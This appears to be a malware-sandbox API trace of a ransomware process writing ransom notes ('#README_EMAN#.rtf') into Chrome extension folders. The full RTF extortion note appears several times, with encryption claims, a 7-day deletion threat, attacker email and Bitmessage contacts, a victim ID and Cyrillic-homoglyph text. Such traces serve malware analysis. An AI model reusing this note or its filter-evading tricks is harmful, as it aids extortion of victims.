BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.195] WriteFile (in: hFile=0x2d4, lpBuffer=0x235fca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235fca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.196] CloseHandle (hObject=0x2d4) returned 1 [0289.196] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0289.196] GetLastError () returned 0x2 [0289.196] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.196] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.196] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.196] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 